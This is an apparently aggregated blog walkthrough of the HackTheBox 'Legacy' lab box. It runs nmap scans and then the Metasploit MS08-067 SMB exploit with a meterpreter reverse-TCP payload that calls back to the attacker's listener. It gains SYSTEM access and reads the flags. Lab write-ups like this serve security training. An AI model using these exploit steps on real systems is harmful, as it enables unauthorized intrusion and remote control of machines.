惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

www.infosecurity-magazine.com
www.infosecurity-magazine.com
月光博客
月光博客
IT之家
IT之家
博客园 - Franky
大猫的无限游戏
大猫的无限游戏
博客园 - 【当耐特】
Recorded Future
Recorded Future
罗磊的独立博客
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
T
Tailwind CSS Blog
Apple Machine Learning Research
Apple Machine Learning Research
博客园 - 聂微东
Last Week in AI
Last Week in AI
S
Schneier on Security
Google DeepMind News
Google DeepMind News
C
CERT Recently Published Vulnerability Notes
NISL@THU
NISL@THU
AWS News Blog
AWS News Blog
D
Docker
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
酷 壳 – CoolShell
酷 壳 – CoolShell
博客园 - 叶小钗
Spread Privacy
Spread Privacy
The GitHub Blog
The GitHub Blog
MongoDB | Blog
MongoDB | Blog
P
Palo Alto Networks Blog
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
V
V2EX
T
Tenable Blog
A
Arctic Wolf
C
Cisco Blogs
S
SegmentFault 最新的问题
T
The Exploit Database - CXSecurity.com
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
Martin Fowler
Martin Fowler
G
GRAHAM CLULEY
The Register - Security
The Register - Security
Project Zero
Project Zero
H
Hackread – Cybersecurity News, Data Breaches, AI and More
Latest news
Latest news
J
Java Code Geeks
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
T
Threatpost
L
LangChain Blog
D
Darknet – Hacking Tools, Hacker News & Cyber Security
腾讯CDC
I
Intezer
Schneier on Security
Schneier on Security
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org

Homepage on Aditya Telange

One Year with evil-winrm-py - A Retrospective Bypassing LinkedIn's Connection Privacy with a Simple Search Filter Making Dynamic Instrumentation Accessible with Frida UI Breaking Payload Encryption in Web Applications HackTheBox (HTB) - Escape HackTheBox (HTB) - Resolute HackTheBox (HTB) - Certified State of VMWare Workstation (Pro?) on Linux Android App Security Testing Lab with MobSleuth Android phone as a Webcam on Linux Breaking down Reverse shell commands HackTheBox (HTB) - Photobomb Merging AOSP Security Patches into Custom ROMs Primer on HTTP Security Headers Image Zoom-In effect with HUGO HackTheBox (HTB) - Lame Cryptohack - Keyed Permutations [5 pts] Cryptohack - Resisting Bruteforce [10 pts] Cryptohack - RSA Starter 1 [10 pts] Cryptohack - Base64 [10 pts] Cryptohack - Bytes and Big Integers [10 pts] Cryptohack - Hex [5 pts] Cryptohack- XOR Starter [10 pts] HackTheBox (HTB) - Horizontall HackTheBox (HTB) - Forge HackTheBox (HTB) - Previse HackTheBox (HTB) - BountyHunter HackTheBox (HTB) - Explore HackTheBox (HTB) - Cap HackTheBox (HTB) - Pit HackTheBox (HTB) - Knife HackTheBox (HTB) - Love HackTheBox (HTB) - Tenet HackTheBox (HTB) - Ready Watermarking images with HUGO My Github Project went viral! Cryptohack - ASCII [5 pts] Cryptohack - Finding Flags [2 pts] Cryptohack - Great Snakes [3 pts] Cryptohack - JWT Sessions [10 pts] Cryptohack - Network Attacks [5 pts] Cryptohack - Token Appreciation [5 pts] CAF's Android for MSM Basic Website Analytics with Vercel Github Actions as Temporary File Sharing Platform Addition of prebuilt APK - AOSP Rom Development External Link With target='_blank' in Hugo Markdown Setting Up Build Environment - AOSP Rom Development Getting Started - AOSP Rom Development Using Secure HTTP Headers with Vercel/Zeit Education and Certifications Link Tree ↟ | Aditya Telange Personal Projects Resume - Aditya Telange Security Acknowledgements About Me Graph View License Privacy Policy
HackTheBox (HTB) - Legacy
[Aditya Telange](https://x.com/adityatelange) · 2022-06-04 · via Homepage on Aditya Telange
Box Info
  • Name: Legacy
  • OS: Windows
  • Difficulty: Easy
  • Machine Creator: ch4p

Introduction

Legacy is a relatively easy box which has SMB running on Windows XP(2000) OS. We find the exploit with metasploit and get access to priviledged user NT AUTHORITY\SYSTEM directly.

Scanning and Information Gathering

Nmap Scan

nmap -p- -T4 -min-rate=1000 -oN 10.129.227.181
# Nmap 7.80 scan initiated Fri Jun  3 15:40:41 2022 as: nmap -p- -T4 -min-rate=1000 -oN ports.out 10.129.227.181
Nmap scan report for 10.129.227.181
Host is up (0.14s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

# Nmap done at Fri Jun  3 15:42:09 2022 -- 1 IP address (1 host up) scanned in 87.81 seconds
nmap -sC -sV -v -oN nmap.out -p 135,139,445 -Pn 10.129.227.181
# Nmap 7.80 scan initiated Fri Jun  3 15:43:24 2022 as: nmap -sC -sV -v -oN nmap.out -p 135,139,445 -Pn 10.129.227.181
Nmap scan report for 10.129.227.181
Host is up (0.14s latency).

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m16s, median: 4d22h57m39s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:96:dc:06 (VMware)
| Names:
|   LEGACY<00>           Flags: <unique><active>
|   HTB<00>              Flags: <group><active>
|   LEGACY<20>           Flags: <unique><active>
|   HTB<1e>              Flags: <group><active>
|   HTB<1d>              Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-06-08T20:41:24+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun  3 15:44:35 2022 -- 1 IP address (1 host up) scanned in 71.43 seconds

Exploiting

We will be using 139,445 - Pentesting SMB from hacktricks 1

Using msf2 we search for an exploit for: SMB, windows 2000

Using exploit/windows/smb/ms08_067_netapi as it mentions Rank: great and Check: Yes.

msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.139     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.129.227.181
RHOSTS => 10.129.227.181
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.139:4444
[*] 10.129.227.181:445 - Automatically detecting the target...
[*] 10.129.227.181:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.227.181:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.227.181:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.129.227.181
[*] Meterpreter session 3 opened (10.10.14.139:4444 -> 10.129.227.181:1036) at 2022-06-03 16:19:32 +0000

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

We have 2 users

meterpreter > ls
Listing: C:\Documents and Settings
==================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  0     dir   2017-03-16 06:07:21 +0000  Administrator
040777/rwxrwxrwx  0     dir   2017-03-16 05:29:48 +0000  All Users
040777/rwxrwxrwx  0     dir   2017-03-16 05:33:37 +0000  Default User
040777/rwxrwxrwx  0     dir   2017-03-16 05:32:52 +0000  LocalService
040777/rwxrwxrwx  0     dir   2017-03-16 05:32:43 +0000  NetworkService
040777/rwxrwxrwx  0     dir   2017-03-16 05:33:42 +0000  john

We get user flag at C:\Documents and Settings\john\Desktop

meterpreter > pwd
C:\Documents and Settings\john\Desktop
meterpreter > ls
Listing: C:\Documents and Settings\john\Desktop
===============================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 06:19:49 +0000  user.txt

meterpreter > cat user.txt
e69a███████████████████████7644f

And Administrator flag at C:\Documents and Settings\Administrator\Desktop

meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop
meterpreter > dir
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 06:18:50 +0000  root.txt

meterpreter > cat root.txt
9934███████████████████████d5713